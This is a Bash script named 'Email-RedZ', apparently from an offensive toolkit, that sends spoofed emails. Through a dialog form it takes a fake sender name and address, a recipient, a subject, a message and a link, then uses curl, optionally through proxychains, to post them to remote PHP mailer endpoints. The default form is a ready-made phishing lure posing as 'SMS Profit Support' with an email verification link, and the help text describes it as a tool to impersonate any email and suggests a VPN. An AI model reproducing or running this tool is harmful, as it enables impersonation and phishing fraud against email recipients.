#!/bin/bash
#Email-RedZ
#Coded by Z3R07-RED on Nov 5 2020
#
#Define colors
if [[ -f $colors ]]; then
    source $colors
fi
#VARIABLES:
#DIALOG=${DIALOG=dialog}
email_file_tmp="$tmp_directory/email.tmp"

#FUNCTIONS:

function send_an_email(){
let _email_=$(grep . $email_file_tmp |wc -l)

if [[ $_email_ == 6 ]]; then
NOMBRE=$(awk 'NR==1' $email_file_tmp)
REMITENTE=$(awk 'NR==2' $email_file_tmp)
DESTINATARIO=$(awk 'NR==3' $email_file_tmp)
ASUNTO=$(awk 'NR==4' $email_file_tmp)
MENSAJEIN=$(awk 'NR==5' $email_file_tmp)
LINK=$(awk 'NR==6' $email_file_tmp)
MENSAJE="$MENSAJEIN $LINK"

$PROXYCHAINS curl --data "nombre=$NOMBRE && remitente=$REMITENTE && destinatario=$DESTINATARIO && asunto=$ASUNTO && mensaje=$MENSAJE" $web_email_redz_php 2>/dev/null
rm $email_file_tmp 2>/dev/null
$DIALOG --colors --backtitle "$program_name" \
    --title "Email-RedZ" \
    --msgbox "\n[\Z2EMAIL\Zn]: The email was sent successfully.\nIt can take up to 2 hours for the email to reach its destination." 10 50
else
rm $email_file_tmp 2>/dev/null
$DIALOG --colors --backtitle "$program_name - Email-RedZ" \
    --title "ERROR" \
    --msgbox "\n[\Zb\Z1EMAIL\Zn]: The email could not be sent." 10 50
fi
}

function complete_form_email(){
tput cnorm
NOMBRE="SMS Profit Support"
REMITENTE="smsprofit007@smsmails.com"
DESTINATARIO=""
ASUNTO="SMS Profit email address verify link"
MENSAJE="Click on below link to verify email address:"
LINK=""
exec 3>&1
VALUES=$($DIALOG --ok-label "Submit" --colors \
    --backtitle "$program_name - Email-RedZ" \
    --title "[EMAIL]" \
    --clear \
    --form "To send the email press the '\Z4\Zb\ZuTAB\Zn' key and then '\Z4\Zb\ZuENTER\Zn'" \
    15 55 6 \
    "FAKE-NAME:"       1 1 "$NOMBRE"        1 12 35 60 \
    "FAKE-MAIL:"       2 1 "$REMITENTE"     2 12 35 50 \
    "EMAIL-TO :"       3 1 "$DESTINATARIO"  3 12 35 80 \
    "SUBJECT  :"       4 1 "$ASUNTO"        4 12 35 150 \
    "MESSAGE  :"       5 1 "$MENSAJE"       5 12 35 9000 \
    "LINK     :"       6 1 "$LINK"          6 12 35 3000 \
2>&1 1>&3)
form_status=$?
exec 3>&-

case $form_status in
    0)
        tput civis
        printf "$VALUES\n" > $email_file_tmp
        sleep 0.3
        send_an_email
        ;;
    1)
        tput civis
        sleep 0.3
        ;;
    255)
        echo $(clear)
        echo "Program aborted." >&2
        echo "";exit 1
        ;;
esac
}

#PERSONALIZED EMAIL
function personalizad_email(){
personalizad_option=$($DIALOG --stdout --item-help --backtitle "$program_name - Email-RedZ" \
                        --colors --title "" \
                        --clear --radiolist "PERSONALIZED-EMAIL" 12 41 3 \
                        "1" "[ FRIENDLY EMAIL ]" off "Press the \Z2\Zr'SPACE'\Zn key and then \Z2\Zr'ENTER'\Zn" \
                        "2" "[ SEXI EMAIL     ]" off "Press the \Z2\Zr'SPACE'\Zn key and then \Z2\Zr'ENTER'\Zn" \
                        "3" "[ HACKER EMAIL   ]" off "Press the \Z2\Zr'SPACE'\Zn key and then \Z2\Zr'ENTER'\Zn")
poechoice=$?
case $poechoice in
    0)
        if [[ $personalizad_option == "1" ]]; then
            web_email_redz_php="https://email-web-07.000webhostapp.com/enviarMail.php"
            complete_form_email
        elif [[ $personalizad_option == "2" ]]; then
            web_email_redz_php="https://email-web-07.000webhostapp.com/enviarMail.1.2.php"
            complete_form_email
        elif [[ $personalizad_option == "3" ]]; then
            web_email_redz_php="https://email-web-07.000webhostapp.com/enviarMail.1.3.php"
            complete_form_email
        fi
        ;;
    1)
        sleep 0.3
        ;;
    255)
        echo $(clear)
        echo "Program aborted." >&2
        echo "";exit 1
        ;;
esac
}

#MENU
function email_menu_options(){
web_email_redz_php=""
while :
do
    email_menu=$($DIALOG --stdout --help-button --item-help \
        --clear --ok-label "Select" \
        --backtitle "$program_name - Email-RedZ" \
        --title "" \
        --menu "Email-Supplant" 12 51 3 \
        "1" "[ PERSONALIZED EMAIL ]" "It works for gmail and others."\
        "2" "[ SEND FALSE EMAIL   ]" "It works for gmail and others."\
        "3" "[ SEND FALSE EMAIL   ]" "It only works for hotmail.")

case $? in
    0)
		sleep 0.2
		if [[ -n $email_menu ]]; then
			if [[ $email_menu == 1 ]]; then
				personalizad_email
			elif [[ $email_menu == 2 ]]; then
				web_email_redz_php="https://shelterless-catches.000webhostapp.com/enviarMail.php"
				complete_form_email
			elif [[ $email_menu == 3 ]]; then
				web_email_redz_php="https://email-web-07.000webhostapp.com/enviarMail2.php"
				complete_form_email
			fi
		fi
        ;;
    1)
        sleep 0.3
		break
        ;;
    2)
        $DIALOG --backtitle "$program_name - Email-RedZ" \
            --title "HELP" --msgbox "Tool to impersonate any email.\n\
For your safety, use a VPN and don't do illegal things with the tool.\n\n\
This tool can only be used once a day." 10 51
        ;;
    255)
        echo $(clear);tput cnorm
        echo "Program aborted." >&2
        echo "";exit 1
        ;;
esac

done
}

email_menu_options
